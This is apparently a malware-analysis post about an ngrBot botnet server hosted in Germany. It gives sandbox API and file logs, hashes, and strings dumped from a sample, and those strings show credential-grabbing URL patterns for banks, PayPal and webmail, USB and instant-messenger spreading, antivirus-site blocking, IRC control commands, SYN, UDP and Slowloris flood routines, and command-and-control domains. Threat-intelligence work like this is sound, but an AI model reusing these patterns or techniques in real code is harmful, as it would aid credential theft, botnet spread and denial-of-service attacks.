rlz1lola.info (ngrBot hosted in Germany, Hetzner Online AG)

Large ngrBot server hosted in Germany.
Here you have the strings from two executable samples.

30upjmrlzz.exe

Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
2872    1236        C:Documents and SettingsMes documents30upjmrlzz.exe    

Ports:
Port    PID    Type    Path    
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

IE Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

Loaded Drivers:
Driver File    Company Name    Description    
--------------------------------------------------

Monitored RegKeys
Registry Key    Value    
--------------------------------------------------

Kernel31 Api Log
    
--------------------------------------------------
***** Installing Hooks *****    
719f74df     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)    
719f80c4     RegOpenKeyExA (Protocol_Catalog9)    
719f777e     RegOpenKeyExA (00000095)    
719f764d     RegOpenKeyExA (Catalog_Entries)    
719f7cea     RegOpenKeyExA (000000000001)    
719f7cea     RegOpenKeyExA (000000000002)    
719f7cea     RegOpenKeyExA (000000000003)    
719f7cea     RegOpenKeyExA (000000000004)    
719f7cea     RegOpenKeyExA (000000000005)    
719f7cea     RegOpenKeyExA (000000000006)    
719f7cea     RegOpenKeyExA (000000000007)    
719f7cea     RegOpenKeyExA (000000000008)    
719f7cea     RegOpenKeyExA (000000000009)    
719f7cea     RegOpenKeyExA (000000000010)    
719f7cea     RegOpenKeyExA (000000000011)    
719f7cea     RegOpenKeyExA (000000000012)    
719f7cea     RegOpenKeyExA (000000000013)    
719f7cea     RegOpenKeyExA (000000000014)    
719f7cea     RegOpenKeyExA (000000000015)    
719f7cea     RegOpenKeyExA (000000000016)    
719f7cea     RegOpenKeyExA (000000000017)    
719f7cea     RegOpenKeyExA (000000000018)    
719f7cea     RegOpenKeyExA (000000000019)    
719f2623     WaitForSingleObject(77c,0)    
719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    
719f777e     RegOpenKeyExA (00000039)    
719f835b     RegOpenKeyExA (Catalog_Entries)    
719f84ef     RegOpenKeyExA (000000000001)    
719f84ef     RegOpenKeyExA (000000000002)    
719f84ef     RegOpenKeyExA (000000000003)    
719f84ef     RegOpenKeyExA (000000000004)    
719f2623     WaitForSingleObject(774,0)    
719e1af2     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)    
719e198e     GlobalAlloc()    
7c80b72f     ExitThread()    
7d2454bb     LoadLibraryA(KERNEL32.DLL)=7c800000    
7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    
73371c38     GetCommandLineA()    
73372f57     CreateMutex((null))    
7d23eab5     WaitForSingleObject(764,7530)    
410de8     LoadLibraryA(KERNEL32.DLL)=7c800000    
410de8     LoadLibraryA(MSVBVM60.DLL )=73370000    
733739f4     GetCommandLineA()    
7338d1b3     LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0    
7337452c     GetVersionExA()    
7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    
772370b9     GetVersionExA()    
7723711c     GetCommandLineA()    
7337476c     LoadLibraryA(SXS.DLL)=77210000    
774efa66     LoadLibraryA(oleaut32.dll)=770e0000    
73376792     RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)    
77daeff6     RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)    
770fc957     LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000    
7337a15b     LoadLibraryA(kernel32.dll)=7c800000    
406f1e     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(USER32)=7e390000    
7345d09c     CreateFileA(C:Documents and SettingsMes documents30upjmrlzz.exe)    
7345d34f     ReadFile()    
406f1e     LoadLibraryA(NTDLL)=7c910000    
7c8165b3     WaitForSingleObject(74c,64)    
7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    
7337a4c5     GetCurrentProcessId()=1236    
7337bdfa     RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)    
7337be1c     RegOpenKeyExA (HTML Help)    
7337be1c     RegOpenKeyExA (Help)    
7337c9ce     WaitForSingleObject(7e4,ffffffff)    
73373657     ExitProcess()    
***** Injected Process Terminated *****    

DirwatchData
    
--------------------------------------------------
WatchDir Initilized OK    
Watching C:DOCUME~1LOCALS~1Temp    
Watching C:WINDOWS    
Watching C:Program Files    
Created: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf    
Modifed: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf    
Created: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp    
Created: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp    
File: 30upjmrlzz.exe
Size: 116236 Bytes
MD5: AB7DDF19DE425E6439160DD343B391E1
Packer: File not found C:iDEFENSESysAnalyzerpeid.exe

File Properties: CompanyName      H3 7H
FileDescription  
FileVersion      43.34.0003
InternalName     1
LegalCopyright   
OriginalFilename 
ProductName      4H37H
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 312Kb in 0,031 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d

RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

ExeRefs
--------------------------------------------------
File: 30upjmrlzz_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Exploreriexplore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe

Raw Strings:
--------------------------------------------------
File: 30upjmrlzz_dmp.exe_
MD5:  20355b2f65c907536ac74b1c4cae1189
Size: 319490

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
WPVS
t1h(
_[^]
QRPWV
RPQWV
QRPSV
txVhD
uaVhD
QRPSV
SVW3
u3h0
u!h(
u3h0
PQRV
RPQW
u:WhD
u#WhD
QRPW
RPQV
RPQV
PQRV
RPQW
RSSh
vG9u
t0WSV
WVRj
WSPQR
vt9u
t0WSV
WVRj
WSPQR
gfff
WVRj
PWQR
u3h0
u!h(
u3h0
>CAL 
uGh4
=MSG t
=SDG 
>MSG u`
SVW3
SVW3
9:vP
G;9r
@W;F
Wj h
t&j,j
Wjdj
F4VP
SWf9
t-f;
t=hH
_^[]
=pzC
|04+~4
_^[]
SVWP3
QWSVR
=lzC
QPRWS
RPQS
WQRV
_^[]
_^[]
un9F
t2j h
L9_@vI
;_@r
WVPQR
SQRj
STFU
=pzC
A8j@
QWRPV
B0QPV
=4yA
PQRj
PQRj
SVWh
STFU
Vh@P@
L9^8vE
;^8r
=pzC
hpP@
STFU
PL9^(v^
9+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
;^(r
9~0v/
;~0r
9^8v;
:+=pzC
+=pzC
+=pzC
;^8r
9^@v2
:+=pzC
+=pzC
+=pzC
;^@r
tu9]
RVWPQ
uXWV
QVWRP
u$WP
E$_^[
tpVW
uTVW
E$_^[
E$^[
E$_^[
j&hx
t}hP
QVWh
95hVA
QVht
8POST
tWWV
PQWj
RPQVW
RPQVW
WVRPS
u h(
QWRS
SVWh
SVW3
95PWA
;5PWA
95PWA
;5PWA
VWQh4
t"j V
SVWh
=USERt
=PASS
:Uu#Vh
8Pu.
=FEATt
=TYPEt
=PASVu
=STATt
=LISTu
uuhh
ucWVh
RPQh
PQRh
QRPh
QVh:
Rh~f
_[^]
_[^]
F/PQ
~(WR
T0(RW
t=VW
Qh~f
u4SV
W$RP
tmQh
RSSh
t,PVQ
O,@PQ
TSVW3
WWWWh
F4RP
LSVW3
^<^[
V4QR
vJ9^,u
;F8v
N4PQ
F4RP
F@@PR
F,BRP
u-SSV
RSWWj
8httpu1
u$8H
QRVP
RVPQ
QRVP
RVPQ
=|[A
Qh~f
SVWP
=|[A
Rh~f
hh)A
h`)A
=|[A
tlWP
=|[A
tlWP
=|[A
Rh~f
=|[A
=|[A
_^[]
h0^A
hh^A
SVWj
_^Yj
QPPPPh
h(*A
SVWj,
VjP
[@^]
Vj.P
[@^]
QRRj
RRRRf
[_^]
SVWh
h0*A
*t2:
VhH*A
Qh4*A
QSV3
j PhxWA
h`*A
Vj#S
_^[]
Wj*P
^[_]
h0+A
h$+A
SVWh
VVVV
WWVS
SVW3
RVh-
@PVj
PVh-
VhH+A
SVW3
@PVj
RVj"W
hT+A
hT+A
h|+A
ht+A
Rhh+A
QhX+A
@PVR
Wj j+V
<%u2
VVVV
SVWh
QRPu
PQRu
h ,A
QRhL]A
PhTA
Ph$]A
9Q@w
RRhh
h`]A
h`]A
h`]A
h`]A
Ph0]A
8nu8h
Rh0]A
Qh0]A
Rh0]A
Ph@]A
8nu8h
Rh@]A
Qh@]A
Rh@]A
htXA
h@XA
PVRQhT`A
PQRVh
RQPhT`A
PQRSh
8_^[
hPXA
hXA
hHXA
Rh0]A
Rh0]A
Rh@]A
Qh@]A
h|,A
h|,A
hx,A
QhP_A
Qh|_A
hx,A
h(XA
hp,A
hd,A
h8XA
8httpuM
8:uE
u>8P
PhD,A
$_^[
Qh@`A
 _^[
h@,A
h(`A
h|bA
QRPh4,A
h`XA
h4XA
hXXA
hpXA
QRPh4,A
hhXA
RPQh4,A
SVWh
8#t"
RVWP
SVWR
hx,A
hx,A
hx]A
Qhl]A
PQh0]A
u(hl
Ph$]A
QRh0]A
SVW3
h -A
t"h<-A
t"h0-A
u5h(-A
Vh$cA
VhDcA
VhdcA
VhpcA
t)h0u
SVW3
RPhD-A
QRPh
QRPh
PQRhTaA
PQhDbA
PRh(aA
QRPh
SVW3
tRh|,A
uBPh
h`]A
h -A
PWQRh
SPQh
PSRhTaA
PhTaA
PRhDbA
Ph(aA
hx,A
tqCh
s[h5
ht.A
SWhl.A
hd.A
t'j j
h<.A
h46A
SVWh
hx,A
Rh$6A
h/A
h/A
tb@Ph
Rhd/A
;< t
SVW3
Wh00A
h 0A
5$iA
50iA
5<iA
5HiA
5TiA
5`iA
5liA
95$iA
6 iA
taVW
h@0A
hD0A
Ph<_A
|Sj 3
tlSSSSSSSSSShL0A
Phd0A
tU< u
u2Wh
h(3A
hT+A
hT+A
SVWh
hT+A
h,3A
u.h,3A
SVWh
RhP3A
PVQR
h@3A
;SDG 
8SDG 
h,3A
Qhx3A
RPhl3A
QRhT3A
t!WV
_^[]
hl.A
hd.A
hl.A
hd.A
h(mA
h(5A
t!h85A
_^t)
9|:~
:~+w:~
tK@boL@
L@iBK@
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
.pipe%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG 
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
.PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host: 
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 -> 
FTP -> 
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
SoftwareMicrosoftWindowsCurrentVersionRun
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length: 
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability: 
From: 
Content-Length: %d
X-MMS-IM-Format: 
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
send
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
 n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
!!!!!!!!
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x
lalorlz1.info
ROCKR
rlz1lola.info
ROCKR
rlz01jm.info
ROCKR
#ROCK
ngrBot
ELPERRO
]1.1.0.0
CUSTOMER
FvLQ49IlzIyLjj6m
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
F4XA
gGWHXA
5hXA
ZpXA
` WA
f0WA
u{A<WA
[@WA
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
.pipe%08x_ipc
0;0G0O0V0d0n0s0
1)13181Y1e1u1|1
2C2c2
3 363M3j3u3
6(6/686J6O6T6m6
7 7(7O7V7_7
7=8T88
9#9:9W9^9f9~9
98:R:[:
;U<e<j<p<
<g=o=
>*>N>
?%?/?6?A?P?
0<0E0L0S0c0i0t0{0
2!3-4d4n4s4
5(5:5?5D5a5x5
6 6J6a6
7&7.7>7I7N7f7
1#2_2
8"8Q8X8g8q8
9':;:Y:
<'<1<H<X<x<
=%=7=D=K=Z=w=}=
>@>R>>m>
?1?<?B?j?
0g0g1
1"2Q2~2
203N3
424>4^4
8;9~9
:K:';A;_;
<4<><T<^<h<
=*=>=D=N=l=u=
>#>)>8>>>O>Y>^>p>u>
?8?L?c?u?
0$1-1H1N1_1n1
313Y3k3
414l4
515B5P5u5
676V6_6f6v6
889Y9r9
:-:G:
;#;(;2;7;<;A;F;W;
<5<?<^<
<W=l=|=
=d>o>{>
?/?U?`?p?
1P2T2X2
3?4a4h4
5A5H5|5
7U8]8f8}8
9'9-939q9
: :%:n:
;1;J;d;
<%<3<<<B<i<v<
=$=+=0===E=L=T=o=v=
=6>E>
?%?4??
0'0K0s0x0}0
091M1g1t1
3[3q3
3*494
4-575w5~5
5B6L6
6(7I7]7z7
848_9m9w9
:+:1:7:D:Q:V:e:t:
; ;,;8;L;Q;V;n;s;x;};
;5<B<]<w<
=5===B=N=S=g=l=
5"6-6B6L6Q6c6u6
7 70767=7L7R7
94:{:
'010
1.1F1^1
2(2>2P2b2t2
4K5f5
6=6K6Y6
7*7/7L7S7r7
8]8i8
9+9;9A9G9d9q9w9}9
9/:b:h:
;!;S;`;h;s;
;E<e<w<
=.=<=A=F=L=R=k=u=
>#>,>X>
?-??y?
42484T4`4f4
4X5]5|5
6-646D6Q6[6b6g6q6z6
9 9&9<9G9R9W99q9v9
9::G:M:b:j:z:
;.;6;;;B;H;S;c;k;
<+<F<T<`<
=3=E=Q=
>3>T>k>z>
?Z?r?{?
%0<0V0h0
141>1l1
3g3r3
34c4
5*585R5w5
6!6<6R6a6
7=7C7T7g7z7
8-9L9w9
9-:D:W:
;#;4;:;T;Z;
<#<(<-<2<7<P<j<w<
=)=.=K=[=`=}=
>+>I>V>[>s>z>
?*?H?T?a?g?u?
0,0J0Z0g0l0v0
1%101=1C1I1W1s1y1
2'212<2J2_2
3"3@3P3V3
4)4J4h4x4
535Q5s5
6!6.656D6S6`6m6z6
7?7E7
7'8,818[8w8
8.9K9V9s9
:':,:D:T:Y:r:
;2;7;W;r;w;|;
<$<5<<<F<N<b<
=(=I=O=Z=r=|=
>V>g>|>
>#?h?
0-070D0x0
0@1G1
132D2Z2p2
3*343=3R3^3
3-434=4F5P5]5
536N6[6
637B7U7d7q7
818>8T8]8|8
9T9`9o9u9z9
:!:,:3:;:A:O:Y:f:l:r:
;(;3;9;?;Q;];c;i;{;
<&<3<8<G<T<Z<`<n<
<,=3=A=G=W=w=|=
>@>E>>
>W?`?
010C0H0M0a0f0k0
1 1$1<1M1U1
1-2O2z2
3I3Z3o3z3
4"4'4<4U4_4t4z4
575=5r5|5
6(6=6P6m6z6
7 767<7~7
8A8F8Y8c8j8
999C9
:%:,:3:=:F:e:
;+;=;D;X;];c;i;n;
;.<4<;<@<e<p<w<
="=*=0=;=F=O=Z=b=g=v={=
=7>N>W>]>
>&?7?~?
40;0A0Q0a0
2)2A2[2
2T3]3f5
6F6Y6t6
7I7Y7_7e7k7q7w7}7
8*808;8~8
9 9O9X9^9
9$:0:Q:
:&;2;8;F;
<"<2<=<Q<W<i<
=$=*=4=:=E=K=S=e=
>;>I>
?!?F?M?W?
1$1<1I1[1g1
2%2>2V2a2t2|2
373E3M3a3l3
3@4N4U4
5/565<5R5k5
666i6
7.7M7
8,818M8[8`8
8?9R9
:#:4:9:?:E:P:{:
;#;B;U;[;b;r;
<!<o<
=$=;=C=N=S=X=i=n=s=}=
>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|>
?B?H?N?T?Z?`?f?l?r?x?~?
4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6
7D7L7X77`7d7h7l7p7t7
9(949@9L9X9d9p9|9
:$:0:<:H:T:`:l:x:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h;
4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8
